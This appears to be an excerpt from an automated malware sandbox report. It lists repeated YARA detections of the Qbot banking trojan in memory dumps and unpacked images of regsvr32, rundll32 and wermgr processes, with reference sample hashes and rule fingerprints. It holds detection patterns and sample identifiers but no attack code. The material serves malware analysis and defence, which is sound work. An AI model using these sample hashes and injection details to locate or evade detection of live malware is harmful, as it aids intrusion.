          Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: pebbles.dat.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
